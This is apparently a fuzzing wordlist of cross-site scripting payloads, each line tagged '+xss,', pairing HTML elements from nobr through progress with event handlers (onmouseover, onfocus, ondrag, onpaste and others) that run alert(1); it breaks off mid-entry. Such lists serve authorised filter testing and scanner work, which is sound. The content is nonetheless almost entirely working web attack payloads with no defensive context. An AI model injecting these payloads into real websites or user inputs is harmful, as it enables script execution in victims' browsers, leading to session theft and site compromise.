+xss,'<nextid onmouseover="alert(1)">test</nextid>' +xss,'<nextid onmouseup="alert(1)">test</nextid>' +xss,'<nextid onpaste="alert(1)" contenteditable>test</nextid>' +xss,'<nobr draggable="true" ondrag="alert(1)">test</nobr>' +xss,'<nobr draggable="true" ondragend="alert(1)">test</nobr>' +xss,'<nobr draggable="true" ondragenter="alert(1)">test</nobr>' +xss,'<nobr draggable="true" ondragleave="alert(1)">test</nobr>' +xss,'<nobr draggable="true" ondragstart="alert(1)">test</nobr>' +xss,'<nobr id=x tabindex=1 onactivate=alert(1)></nobr>' +xss,'<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr>' +xss,'<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus>' +xss,'<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus>' +xss,'<nobr id=x tabindex=1 onfocus=alert(1)></nobr>' +xss,'<nobr id=x tabindex=1 onfocusin=alert(1)></nobr>' +xss,'<nobr onbeforecopy="alert(1)" contenteditable>test</nobr>' +xss,'<nobr onbeforecut="alert(1)" contenteditable>test</nobr>' +xss,'<nobr onbeforepaste="alert(1)" contenteditable>test</nobr>' +xss,'<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus>' +xss,'<nobr onclick="alert(1)">test</nobr>' +xss,'<nobr oncontextmenu="alert(1)">test</nobr>' +xss,'<nobr oncopy="alert(1)" contenteditable>test</nobr>' +xss,'<nobr oncut="alert(1)" contenteditable>test</nobr>' +xss,'<nobr ondblclick="alert(1)">test</nobr>' +xss,'<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus>' +xss,'<nobr onkeydown="alert(1)" contenteditable>test</nobr>' +xss,'<nobr onkeypress="alert(1)" contenteditable>test</nobr>' +xss,'<nobr onkeyup="alert(1)" contenteditable>test</nobr>' +xss,'<nobr onmousedown="alert(1)">test</nobr>' +xss,'<nobr onmouseenter="alert(1)">test</nobr>' +xss,'<nobr onmouseleave="alert(1)">test</nobr>' +xss,'<nobr onmousemove="alert(1)">test</nobr>' +xss,'<nobr onmouseout="alert(1)">test</nobr>' +xss,'<nobr onmouseover="alert(1)">test</nobr>' +xss,'<nobr onmouseup="alert(1)">test</nobr>' +xss,'<nobr onpaste="alert(1)" contenteditable>test</nobr>' +xss,'<noembed draggable="true" ondrag="alert(1)">test</noembed>' +xss,'<noembed draggable="true" ondragend="alert(1)">test</noembed>' +xss,'<noembed draggable="true" ondragenter="alert(1)">test</noembed>' +xss,'<noembed draggable="true" ondragleave="alert(1)">test</noembed>' +xss,'<noembed draggable="true" ondragstart="alert(1)">test</noembed>' +xss,'<noembed id=x tabindex=1 onactivate=alert(1)></noembed>' +xss,'<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed>' +xss,'<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus>' +xss,'<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus>' +xss,'<noembed id=x tabindex=1 onfocus=alert(1)></noembed>' +xss,'<noembed id=x tabindex=1 onfocusin=alert(1)></noembed>' +xss,'<noembed onbeforecopy="alert(1)" contenteditable>test</noembed>' +xss,'<noembed onbeforecut="alert(1)" contenteditable>test</noembed>' +xss,'<noembed onbeforepaste="alert(1)" contenteditable>test</noembed>' +xss,'<noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus>' +xss,'<noembed onclick="alert(1)">test</noembed>' +xss,'<noembed oncontextmenu="alert(1)">test</noembed>' +xss,'<noembed oncopy="alert(1)" contenteditable>test</noembed>' +xss,'<noembed oncut="alert(1)" contenteditable>test</noembed>' +xss,'<noembed ondblclick="alert(1)">test</noembed>' +xss,'<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus>' +xss,'<noembed onkeydown="alert(1)" contenteditable>test</noembed>' +xss,'<noembed onkeypress="alert(1)" contenteditable>test</noembed>' +xss,'<noembed onkeyup="alert(1)" contenteditable>test</noembed>' +xss,'<noembed onmousedown="alert(1)">test</noembed>' +xss,'<noembed onmouseenter="alert(1)">test</noembed>' +xss,'<noembed onmouseleave="alert(1)">test</noembed>' +xss,'<noembed onmousemove="alert(1)">test</noembed>' +xss,'<noembed onmouseout="alert(1)">test</noembed>' +xss,'<noembed onmouseover="alert(1)">test</noembed>' +xss,'<noembed onmouseup="alert(1)">test</noembed>' +xss,'<noembed onpaste="alert(1)" contenteditable>test</noembed>' +xss,'<noframes draggable="true" ondrag="alert(1)">test</noframes>' +xss,'<noframes draggable="true" ondragend="alert(1)">test</noframes>' +xss,'<noframes draggable="true" ondragenter="alert(1)">test</noframes>' +xss,'<noframes draggable="true" ondragleave="alert(1)">test</noframes>' +xss,'<noframes draggable="true" ondragstart="alert(1)">test</noframes>' +xss,'<noframes id=x tabindex=1 onactivate=alert(1)></noframes>' +xss,'<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes>' +xss,'<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus>' +xss,'<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus>' +xss,'<noframes id=x tabindex=1 onfocus=alert(1)></noframes>' +xss,'<noframes id=x tabindex=1 onfocusin=alert(1)></noframes>' +xss,'<noframes onbeforecopy="alert(1)" contenteditable>test</noframes>' +xss,'<noframes onbeforecut="alert(1)" contenteditable>test</noframes>' +xss,'<noframes onbeforepaste="alert(1)" contenteditable>test</noframes>' +xss,'<noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus>' +xss,'<noframes onclick="alert(1)">test</noframes>' +xss,'<noframes oncontextmenu="alert(1)">test</noframes>' +xss,'<noframes oncopy="alert(1)" contenteditable>test</noframes>' +xss,'<noframes oncut="alert(1)" contenteditable>test</noframes>' +xss,'<noframes ondblclick="alert(1)">test</noframes>' +xss,'<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus>' +xss,'<noframes onkeydown="alert(1)" contenteditable>test</noframes>' +xss,'<noframes onkeypress="alert(1)" contenteditable>test</noframes>' +xss,'<noframes onkeyup="alert(1)" contenteditable>test</noframes>' +xss,'<noframes onmousedown="alert(1)">test</noframes>' +xss,'<noframes onmouseenter="alert(1)">test</noframes>' +xss,'<noframes onmouseleave="alert(1)">test</noframes>' +xss,'<noframes onmousemove="alert(1)">test</noframes>' +xss,'<noframes onmouseout="alert(1)">test</noframes>' +xss,'<noframes onmouseover="alert(1)">test</noframes>' +xss,'<noframes onmouseup="alert(1)">test</noframes>' +xss,'<noframes onpaste="alert(1)" contenteditable>test</noframes>' +xss,'<noscript draggable="true" ondrag="alert(1)">test</noscript>' +xss,'<noscript draggable="true" ondragend="alert(1)">test</noscript>' +xss,'<noscript draggable="true" ondragenter="alert(1)">test</noscript>' +xss,'<noscript draggable="true" ondragleave="alert(1)">test</noscript>' +xss,'<noscript draggable="true" ondragstart="alert(1)">test</noscript>' +xss,'<noscript id=x tabindex=1 onactivate=alert(1)></noscript>' +xss,'<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript>' +xss,'<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus>' +xss,'<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus>' +xss,'<noscript id=x tabindex=1 onfocus=alert(1)></noscript>' +xss,'<noscript id=x tabindex=1 onfocusin=alert(1)></noscript>' +xss,'<noscript onbeforecopy="alert(1)" contenteditable>test</noscript>' +xss,'<noscript onbeforecut="alert(1)" contenteditable>test</noscript>' +xss,'<noscript onbeforepaste="alert(1)" contenteditable>test</noscript>' +xss,'<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus>' +xss,'<noscript onclick="alert(1)">test</noscript>' +xss,'<noscript oncontextmenu="alert(1)">test</noscript>' +xss,'<noscript oncopy="alert(1)" contenteditable>test</noscript>' +xss,'<noscript oncut="alert(1)" contenteditable>test</noscript>' +xss,'<noscript ondblclick="alert(1)">test</noscript>' +xss,'<noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus>' +xss,'<noscript onkeydown="alert(1)" contenteditable>test</noscript>' +xss,'<noscript onkeypress="alert(1)" contenteditable>test</noscript>' +xss,'<noscript onkeyup="alert(1)" contenteditable>test</noscript>' +xss,'<noscript onmousedown="alert(1)">test</noscript>' +xss,'<noscript onmouseenter="alert(1)">test</noscript>' +xss,'<noscript onmouseleave="alert(1)">test</noscript>' +xss,'<noscript onmousemove="alert(1)">test</noscript>' +xss,'<noscript onmouseout="alert(1)">test</noscript>' +xss,'<noscript onmouseover="alert(1)">test</noscript>' +xss,'<noscript onmouseup="alert(1)">test</noscript>' +xss,'<noscript onpaste="alert(1)" contenteditable>test</noscript>' +xss,'<object data=/ onload=alert(1)>' +xss,'<object data=/ onreadystatechange=alert(1)>' +xss,'<object draggable="true" ondrag="alert(1)">test</object>' +xss,'<object draggable="true" ondragend="alert(1)">test</object>' +xss,'<object draggable="true" ondragenter="alert(1)">test</object>' +xss,'<object draggable="true" ondragleave="alert(1)">test</object>' +xss,'<object draggable="true" ondragstart="alert(1)">test</object>' +xss,'<object id=x onfocus=alert(1) type=text/html>' +xss,'<object id=x onfocusin=alert(1) type=text/html>' +xss,'<object id=x tabindex=1 onactivate=alert(1)></object>' +xss,'<object id=x tabindex=1 onbeforeactivate=alert(1)></object>' +xss,'<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus>' +xss,'<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus>' +xss,'<object onbeforecopy="alert(1)" contenteditable>test</object>' +xss,'<object onbeforecut="alert(1)" contenteditable>test</object>' +xss,'<object onbeforepaste="alert(1)" contenteditable>test</object>' +xss,'<object onblur=alert(1) tabindex=1 id=x></object><input autofocus>' +xss,'<object onclick="alert(1)">test</object>' +xss,'<object oncontextmenu="alert(1)">test</object>' +xss,'<object oncopy="alert(1)" contenteditable>test</object>' +xss,'<object oncut="alert(1)" contenteditable>test</object>' +xss,'<object ondblclick="alert(1)">test</object>' +xss,'<object onerror=alert(1) data=1 type=image/gif>' +xss,'<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus>' +xss,'<object onkeydown="alert(1)" contenteditable>test</object>' +xss,'<object onkeypress="alert(1)" contenteditable>test</object>' +xss,'<object onkeyup="alert(1)" contenteditable>test</object>' +xss,'<object onmousedown="alert(1)">test</object>' +xss,'<object onmouseenter="alert(1)">test</object>' +xss,'<object onmouseleave="alert(1)">test</object>' +xss,'<object onmousemove="alert(1)">test</object>' +xss,'<object onmouseout="alert(1)">test</object>' +xss,'<object onmouseover="alert(1)">test</object>' +xss,'<object onmouseup="alert(1)">test</object>' +xss,'<object onpaste="alert(1)" contenteditable>test</object>' +xss,'<ol draggable="true" ondrag="alert(1)">test</ol>' +xss,'<ol draggable="true" ondragend="alert(1)">test</ol>' +xss,'<ol draggable="true" ondragenter="alert(1)">test</ol>' +xss,'<ol draggable="true" ondragleave="alert(1)">test</ol>' +xss,'<ol draggable="true" ondragstart="alert(1)">test</ol>' +xss,'<ol id=x tabindex=1 onactivate=alert(1)></ol>' +xss,'<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol>' +xss,'<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus>' +xss,'<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus>' +xss,'<ol id=x tabindex=1 onfocus=alert(1)></ol>' +xss,'<ol id=x tabindex=1 onfocusin=alert(1)></ol>' +xss,'<ol onbeforecopy="alert(1)" contenteditable>test</ol>' +xss,'<ol onbeforecut="alert(1)" contenteditable>test</ol>' +xss,'<ol onbeforepaste="alert(1)" contenteditable>test</ol>' +xss,'<ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus>' +xss,'<ol onclick="alert(1)">test</ol>' +xss,'<ol oncontextmenu="alert(1)">test</ol>' +xss,'<ol oncopy="alert(1)" contenteditable>test</ol>' +xss,'<ol oncut="alert(1)" contenteditable>test</ol>' +xss,'<ol ondblclick="alert(1)">test</ol>' +xss,'<ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus>' +xss,'<ol onkeydown="alert(1)" contenteditable>test</ol>' +xss,'<ol onkeypress="alert(1)" contenteditable>test</ol>' +xss,'<ol onkeyup="alert(1)" contenteditable>test</ol>' +xss,'<ol onmousedown="alert(1)">test</ol>' +xss,'<ol onmouseenter="alert(1)">test</ol>' +xss,'<ol onmouseleave="alert(1)">test</ol>' +xss,'<ol onmousemove="alert(1)">test</ol>' +xss,'<ol onmouseout="alert(1)">test</ol>' +xss,'<ol onmouseover="alert(1)">test</ol>' +xss,'<ol onmouseup="alert(1)">test</ol>' +xss,'<ol onpaste="alert(1)" contenteditable>test</ol>' +xss,'<optgroup draggable="true" ondrag="alert(1)">test</optgroup>' +xss,'<optgroup draggable="true" ondragend="alert(1)">test</optgroup>' +xss,'<optgroup draggable="true" ondragenter="alert(1)">test</optgroup>' +xss,'<optgroup draggable="true" ondragleave="alert(1)">test</optgroup>' +xss,'<optgroup draggable="true" ondragstart="alert(1)">test</optgroup>' +xss,'<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup>' +xss,'<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup>' +xss,'<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus>' +xss,'<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus>' +xss,'<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup>' +xss,'<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup>' +xss,'<optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup onbeforecut="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus>' +xss,'<optgroup onclick="alert(1)">test</optgroup>' +xss,'<optgroup oncontextmenu="alert(1)">test</optgroup>' +xss,'<optgroup oncopy="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup oncut="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup ondblclick="alert(1)">test</optgroup>' +xss,'<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus>' +xss,'<optgroup onkeydown="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup onkeypress="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup onkeyup="alert(1)" contenteditable>test</optgroup>' +xss,'<optgroup onmousedown="alert(1)">test</optgroup>' +xss,'<optgroup onmouseenter="alert(1)">test</optgroup>' +xss,'<optgroup onmouseleave="alert(1)">test</optgroup>' +xss,'<optgroup onmousemove="alert(1)">test</optgroup>' +xss,'<optgroup onmouseout="alert(1)">test</optgroup>' +xss,'<optgroup onmouseover="alert(1)">test</optgroup>' +xss,'<optgroup onmouseup="alert(1)">test</optgroup>' +xss,'<optgroup onpaste="alert(1)" contenteditable>test</optgroup>' +xss,'<option draggable="true" ondrag="alert(1)">test</option>' +xss,'<option draggable="true" ondragend="alert(1)">test</option>' +xss,'<option draggable="true" ondragenter="alert(1)">test</option>' +xss,'<option draggable="true" ondragleave="alert(1)">test</option>' +xss,'<option draggable="true" ondragstart="alert(1)">test</option>' +xss,'<option id=x tabindex=1 onactivate=alert(1)></option>' +xss,'<option id=x tabindex=1 onbeforeactivate=alert(1)></option>' +xss,'<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus>' +xss,'<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus>' +xss,'<option id=x tabindex=1 onfocus=alert(1)></option>' +xss,'<option id=x tabindex=1 onfocusin=alert(1)></option>' +xss,'<option onbeforecopy="alert(1)" contenteditable>test</option>' +xss,'<option onbeforecut="alert(1)" contenteditable>test</option>' +xss,'<option onbeforepaste="alert(1)" contenteditable>test</option>' +xss,'<option onblur=alert(1) tabindex=1 id=x></option><input autofocus>' +xss,'<option onclick="alert(1)">test</option>' +xss,'<option oncontextmenu="alert(1)">test</option>' +xss,'<option oncopy="alert(1)" contenteditable>test</option>' +xss,'<option oncut="alert(1)" contenteditable>test</option>' +xss,'<option ondblclick="alert(1)">test</option>' +xss,'<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus>' +xss,'<option onkeydown="alert(1)" contenteditable>test</option>' +xss,'<option onkeypress="alert(1)" contenteditable>test</option>' +xss,'<option onkeyup="alert(1)" contenteditable>test</option>' +xss,'<option onmousedown="alert(1)">test</option>' +xss,'<option onmouseenter="alert(1)">test</option>' +xss,'<option onmouseleave="alert(1)">test</option>' +xss,'<option onmousemove="alert(1)">test</option>' +xss,'<option onmouseout="alert(1)">test</option>' +xss,'<option onmouseover="alert(1)">test</option>' +xss,'<option onmouseup="alert(1)">test</option>' +xss,'<option onpaste="alert(1)" contenteditable>test</option>' +xss,'<output draggable="true" ondrag="alert(1)">test</output>' +xss,'<output draggable="true" ondragend="alert(1)">test</output>' +xss,'<output draggable="true" ondragenter="alert(1)">test</output>' +xss,'<output draggable="true" ondragleave="alert(1)">test</output>' +xss,'<output draggable="true" ondragstart="alert(1)">test</output>' +xss,'<output id=x tabindex=1 onactivate=alert(1)></output>' +xss,'<output id=x tabindex=1 onbeforeactivate=alert(1)></output>' +xss,'<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus>' +xss,'<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus>' +xss,'<output id=x tabindex=1 onfocus=alert(1)></output>' +xss,'<output id=x tabindex=1 onfocusin=alert(1)></output>' +xss,'<output onbeforecopy="alert(1)" contenteditable>test</output>' +xss,'<output onbeforecut="alert(1)" contenteditable>test</output>' +xss,'<output onbeforepaste="alert(1)" contenteditable>test</output>' +xss,'<output onblur=alert(1) tabindex=1 id=x></output><input autofocus>' +xss,'<output onclick="alert(1)">test</output>' +xss,'<output oncontextmenu="alert(1)">test</output>' +xss,'<output oncopy="alert(1)" contenteditable>test</output>' +xss,'<output oncut="alert(1)" contenteditable>test</output>' +xss,'<output ondblclick="alert(1)">test</output>' +xss,'<output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus>' +xss,'<output onkeydown="alert(1)" contenteditable>test</output>' +xss,'<output onkeypress="alert(1)" contenteditable>test</output>' +xss,'<output onkeyup="alert(1)" contenteditable>test</output>' +xss,'<output onmousedown="alert(1)">test</output>' +xss,'<output onmouseenter="alert(1)">test</output>' +xss,'<output onmouseleave="alert(1)">test</output>' +xss,'<output onmousemove="alert(1)">test</output>' +xss,'<output onmouseout="alert(1)">test</output>' +xss,'<output onmouseover="alert(1)">test</output>' +xss,'<output onmouseup="alert(1)">test</output>' +xss,'<output onpaste="alert(1)" contenteditable>test</output>' +xss,'<p draggable="true" ondrag="alert(1)">test</p>' +xss,'<p draggable="true" ondragend="alert(1)">test</p>' +xss,'<p draggable="true" ondragenter="alert(1)">test</p>' +xss,'<p draggable="true" ondragleave="alert(1)">test</p>' +xss,'<p draggable="true" ondragstart="alert(1)">test</p>' +xss,'<p id=x tabindex=1 onactivate=alert(1)></p>' +xss,'<p id=x tabindex=1 onbeforeactivate=alert(1)></p>' +xss,'<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus>' +xss,'<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus>' +xss,'<p id=x tabindex=1 onfocus=alert(1)></p>' +xss,'<p id=x tabindex=1 onfocusin=alert(1)></p>' +xss,'<p onbeforecopy="alert(1)" contenteditable>test</p>' +xss,'<p onbeforecut="alert(1)" contenteditable>test</p>' +xss,'<p onbeforepaste="alert(1)" contenteditable>test</p>' +xss,'<p onblur=alert(1) tabindex=1 id=x></p><input autofocus>' +xss,'<p onclick="alert(1)">test</p>' +xss,'<p oncontextmenu="alert(1)">test</p>' +xss,'<p oncopy="alert(1)" contenteditable>test</p>' +xss,'<p oncut="alert(1)" contenteditable>test</p>' +xss,'<p ondblclick="alert(1)">test</p>' +xss,'<p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus>' +xss,'<p onkeydown="alert(1)" contenteditable>test</p>' +xss,'<p onkeypress="alert(1)" contenteditable>test</p>' +xss,'<p onkeyup="alert(1)" contenteditable>test</p>' +xss,'<p onmousedown="alert(1)">test</p>' +xss,'<p onmouseenter="alert(1)">test</p>' +xss,'<p onmouseleave="alert(1)">test</p>' +xss,'<p onmousemove="alert(1)">test</p>' +xss,'<p onmouseout="alert(1)">test</p>' +xss,'<p onmouseover="alert(1)">test</p>' +xss,'<p onmouseup="alert(1)">test</p>' +xss,'<p onpaste="alert(1)" contenteditable>test</p>' +xss,'<param draggable="true" ondrag="alert(1)">test</param>' +xss,'<param draggable="true" ondragend="alert(1)">test</param>' +xss,'<param draggable="true" ondragenter="alert(1)">test</param>' +xss,'<param draggable="true" ondragleave="alert(1)">test</param>' +xss,'<param draggable="true" ondragstart="alert(1)">test</param>' +xss,'<param id=x tabindex=1 onactivate=alert(1)></param>' +xss,'<param id=x tabindex=1 onbeforeactivate=alert(1)></param>' +xss,'<param id=x tabindex=1 onbeforedeactivate=alert(1)></param><input autofocus>' +xss,'<param id=x tabindex=1 ondeactivate=alert(1)></param><input id=y autofocus>' +xss,'<param id=x tabindex=1 onfocus=alert(1)></param>' +xss,'<param id=x tabindex=1 onfocusin=alert(1)></param>' +xss,'<param onbeforecopy="alert(1)" contenteditable>test</param>' +xss,'<param onbeforecut="alert(1)" contenteditable>test</param>' +xss,'<param onbeforepaste="alert(1)" contenteditable>test</param>' +xss,'<param onblur=alert(1) tabindex=1 id=x></param><input autofocus>' +xss,'<param onclick="alert(1)">test</param>' +xss,'<param oncontextmenu="alert(1)">test</param>' +xss,'<param oncopy="alert(1)" contenteditable>test</param>' +xss,'<param oncut="alert(1)" contenteditable>test</param>' +xss,'<param ondblclick="alert(1)">test</param>' +xss,'<param onfocusout=alert(1) tabindex=1 id=x></param><input autofocus>' +xss,'<param onkeydown="alert(1)" contenteditable>test</param>' +xss,'<param onkeypress="alert(1)" contenteditable>test</param>' +xss,'<param onkeyup="alert(1)" contenteditable>test</param>' +xss,'<param onmousedown="alert(1)">test</param>' +xss,'<param onmouseenter="alert(1)">test</param>' +xss,'<param onmouseleave="alert(1)">test</param>' +xss,'<param onmousemove="alert(1)">test</param>' +xss,'<param onmouseout="alert(1)">test</param>' +xss,'<param onmouseover="alert(1)">test</param>' +xss,'<param onmouseup="alert(1)">test</param>' +xss,'<param onpaste="alert(1)" contenteditable>test</param>' +xss,'<picture draggable="true" ondrag="alert(1)">test</picture>' +xss,'<picture draggable="true" ondragend="alert(1)">test</picture>' +xss,'<picture draggable="true" ondragenter="alert(1)">test</picture>' +xss,'<picture draggable="true" ondragleave="alert(1)">test</picture>' +xss,'<picture draggable="true" ondragstart="alert(1)">test</picture>' +xss,'<picture id=x tabindex=1 onactivate=alert(1)></picture>' +xss,'<picture id=x tabindex=1 onbeforeactivate=alert(1)></picture>' +xss,'<picture id=x tabindex=1 onbeforedeactivate=alert(1)></picture><input autofocus>' +xss,'<picture id=x tabindex=1 ondeactivate=alert(1)></picture><input id=y autofocus>' +xss,'<picture id=x tabindex=1 onfocus=alert(1)></picture>' +xss,'<picture id=x tabindex=1 onfocusin=alert(1)></picture>' +xss,'<picture onbeforecopy="alert(1)" contenteditable>test</picture>' +xss,'<picture onbeforecut="alert(1)" contenteditable>test</picture>' +xss,'<picture onbeforepaste="alert(1)" contenteditable>test</picture>' +xss,'<picture onblur=alert(1) tabindex=1 id=x></picture><input autofocus>' +xss,'<picture onclick="alert(1)">test</picture>' +xss,'<picture oncontextmenu="alert(1)">test</picture>' +xss,'<picture oncopy="alert(1)" contenteditable>test</picture>' +xss,'<picture oncut="alert(1)" contenteditable>test</picture>' +xss,'<picture ondblclick="alert(1)">test</picture>' +xss,'<picture onfocusout=alert(1) tabindex=1 id=x></picture><input autofocus>' +xss,'<picture onkeydown="alert(1)" contenteditable>test</picture>' +xss,'<picture onkeypress="alert(1)" contenteditable>test</picture>' +xss,'<picture onkeyup="alert(1)" contenteditable>test</picture>' +xss,'<picture onmousedown="alert(1)">test</picture>' +xss,'<picture onmouseenter="alert(1)">test</picture>' +xss,'<picture onmouseleave="alert(1)">test</picture>' +xss,'<picture onmousemove="alert(1)">test</picture>' +xss,'<picture onmouseout="alert(1)">test</picture>' +xss,'<picture onmouseover="alert(1)">test</picture>' +xss,'<picture onmouseup="alert(1)">test</picture>' +xss,'<picture onpaste="alert(1)" contenteditable>test</picture>' +xss,'<picture><source srcset="validimage.png"><image onload=alert(1)></picture>' +xss,'<picture><source srcset="validimage.png"><image onloadend=alert(1)></picture>' +xss,'<picture><source srcset="validimage.png"><image onloadstart=alert(1)></picture>' +xss,'<picture><source srcset="validimage.png"><img onload=alert(1)></picture>' +xss,'<picture><source srcset="validimage.png"><img onloadend=alert(1)></picture>' +xss,'<picture><source srcset="validimage.png"><img onloadstart=alert(1)></picture>' +xss,'<plaintext draggable="true" ondrag="alert(1)">test</plaintext>' +xss,'<plaintext draggable="true" ondragend="alert(1)">test</plaintext>' +xss,'<plaintext draggable="true" ondragenter="alert(1)">test</plaintext>' +xss,'<plaintext draggable="true" ondragleave="alert(1)">test</plaintext>' +xss,'<plaintext draggable="true" ondragstart="alert(1)">test</plaintext>' +xss,'<plaintext id=x tabindex=1 onactivate=alert(1)></plaintext>' +xss,'<plaintext id=x tabindex=1 onbeforeactivate=alert(1)></plaintext>' +xss,'<plaintext id=x tabindex=1 onbeforedeactivate=alert(1)></plaintext><input autofocus>' +xss,'<plaintext id=x tabindex=1 ondeactivate=alert(1)></plaintext><input id=y autofocus>' +xss,'<plaintext id=x tabindex=1 onfocus=alert(1)></plaintext>' +xss,'<plaintext id=x tabindex=1 onfocusin=alert(1)></plaintext>' +xss,'<plaintext onbeforecopy="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext onbeforecut="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext onbeforepaste="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext onblur=alert(1) tabindex=1 id=x></plaintext><input autofocus>' +xss,'<plaintext onclick="alert(1)">test</plaintext>' +xss,'<plaintext oncontextmenu="alert(1)">test</plaintext>' +xss,'<plaintext oncopy="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext oncut="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext ondblclick="alert(1)">test</plaintext>' +xss,'<plaintext onfocusout=alert(1) tabindex=1 id=x></plaintext><input autofocus>' +xss,'<plaintext onkeydown="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext onkeypress="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext onkeyup="alert(1)" contenteditable>test</plaintext>' +xss,'<plaintext onmousedown="alert(1)">test</plaintext>' +xss,'<plaintext onmouseenter="alert(1)">test</plaintext>' +xss,'<plaintext onmouseleave="alert(1)">test</plaintext>' +xss,'<plaintext onmousemove="alert(1)">test</plaintext>' +xss,'<plaintext onmouseout="alert(1)">test</plaintext>' +xss,'<plaintext onmouseover="alert(1)">test</plaintext>' +xss,'<plaintext onmouseup="alert(1)">test</plaintext>' +xss,'<plaintext onpaste="alert(1)" contenteditable>test</plaintext>' +xss,'<pre draggable="true" ondrag="alert(1)">test</pre>' +xss,'<pre draggable="true" ondragend="alert(1)">test</pre>' +xss,'<pre draggable="true" ondragenter="alert(1)">test</pre>' +xss,'<pre draggable="true" ondragleave="alert(1)">test</pre>' +xss,'<pre draggable="true" ondragstart="alert(1)">test</pre>' +xss,'<pre id=x tabindex=1 onactivate=alert(1)></pre>' +xss,'<pre id=x tabindex=1 onbeforeactivate=alert(1)></pre>' +xss,'<pre id=x tabindex=1 onbeforedeactivate=alert(1)></pre><input autofocus>' +xss,'<pre id=x tabindex=1 ondeactivate=alert(1)></pre><input id=y autofocus>' +xss,'<pre id=x tabindex=1 onfocus=alert(1)></pre>' +xss,'<pre id=x tabindex=1 onfocusin=alert(1)></pre>' +xss,'<pre onbeforecopy="alert(1)" contenteditable>test</pre>' +xss,'<pre onbeforecut="alert(1)" contenteditable>test</pre>' +xss,'<pre onbeforepaste="alert(1)" contenteditable>test</pre>' +xss,'<pre onblur=alert(1) tabindex=1 id=x></pre><input autofocus>' +xss,'<pre onclick="alert(1)">test</pre>' +xss,'<pre oncontextmenu="alert(1)">test</pre>' +xss,'<pre oncopy="alert(1)" contenteditable>test</pre>' +xss,'<pre oncut="alert(1)" contenteditable>test</pre>' +xss,'<pre ondblclick="alert(1)">test</pre>' +xss,'<pre onfocusout=alert(1) tabindex=1 id=x></pre><input autofocus>' +xss,'<pre onkeydown="alert(1)" contenteditable>test</pre>' +xss,'<pre onkeypress="alert(1)" contenteditable>test</pre>' +xss,'<pre onkeyup="alert(1)" contenteditable>test</pre>' +xss,'<pre onmousedown="alert(1)">test</pre>' +xss,'<pre onmouseenter="alert(1)">test</pre>' +xss,'<pre onmouseleave="alert(1)">test</pre>' +xss,'<pre onmousemove="alert(1)">test</pre>' +xss,'<pre onmouseout="alert(1)">test</pre>' +xss,'<pre onmouseover="alert(1)">test</pre>' +xss,'<pre onmouseup="alert(1)">test</pre>' +xss,'<pre onpaste="alert(1)" contenteditable>test</pre>' +xss,'<progress draggable="true" ondrag="alert(1)">test</progress>' +xss,'<progress draggable="true" ondragend="alert(1)">test</progress>' +xss,'<progress draggable="true" ondragenter="alert(1)">test</progress>' +xss,'<progress draggable="true" ondragleave="alert(1)">test</progress>' +xss,'<progress draggable="true" ondragstart="alert(1)">test</progress>' +xss,'<progress id=x tabindex=1 onactivate=alert(1)></progress>' +xss,'<progress id=x tabindex=1 onbeforeactivate=alert(1)></progress>' +xss,'<progress id=x tabindex=1 